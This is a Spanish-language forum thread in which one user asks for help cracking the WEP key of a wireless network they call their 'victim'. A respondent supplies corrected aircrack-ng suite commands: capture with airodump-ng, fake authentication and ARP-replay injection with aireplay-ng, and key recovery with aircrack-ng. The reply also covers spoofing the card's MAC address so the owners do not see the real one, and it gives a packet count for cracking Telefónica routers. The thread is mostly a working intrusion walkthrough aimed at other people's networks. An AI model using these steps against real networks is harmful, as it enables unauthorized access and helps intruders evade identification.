Acaso nadie me responde porque lo hago bien?
Saludos
Buenas, diciendo eso lo que consigues es que la gente no te kiera ayudar, nadie esta obligado a contestarte.
Abro la 1ª ventana y pongo airodump-ng wlan0
Ctrl + c y escribo
airodump-ng -w wep -c 1 --bssid XX:XX:XX:XX:XX:XX wlan0
(bssid el de mi victima)
y empieza a captar Datas / paquetes
Abro la segunda ventana, aveces nada mas hacer el paso anterior, aveces me espero a que tenga 20 o 30 mil apaquetes puesto que si no me sale el error de la memoria.
y escribo aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX wlan0
me sale al final AID: 1)
y escribo aireplay-ng -3 -b XX:XX:XX:XX:XX:XX wlan0
y empieza a inyectar paquetes.
Abro la 3ª ventana y pongo aircrack-ng wep-01.cap
y empieza hacer el descifrado, de mometno siempre me ha dicho que vaya provando con 5 mil mas.
Bueno los pasos que sigues no es que sean de los mejores, se puede hacer mejor, cambiaste la mac de tu tarjeta? dices que corren paquetes miraste si hay un cliente (abajo de la pantalla de airodump) prueba con estos pasos:
ifconfig wlan0 hw ether 00:11:22:33:44:55
Con eso cambias la mac de tu tarjeta por 00:11:22:33:44:55 por si kieres hacerle una inyecion falsa, tambien por seguridad mejor que vean eso que no tu mac verdadera.
iwconfig wlan0 mode monitor
Ponemos la tarjeta modo monitor
Levantamos la tarjeta, esta lista.
Vale el commando de airodump esta bien pero los de aireplay nose nose prueba con esto:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
aver en
-h 00:11:22:33:44:55 le dices que el cliente seas tu, pero si dices que corren los datas seguro que hay un cliente, si lo hay no pongas 00:11:22:33:44:55 pon la mac que sale en airodump, otra cosa fijate si en la pantalla de airodump en
AUTH pone
OPEN si no pone open esos paquetes no se podran leer.
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
Espera a que inyecte, si no prueba otro ataque aqui los tienes:
Si es una red de timofonica son de 128 bits yo las caso con unos 50.000:
Le dices que opcion kieres y ya esta.
Un saludo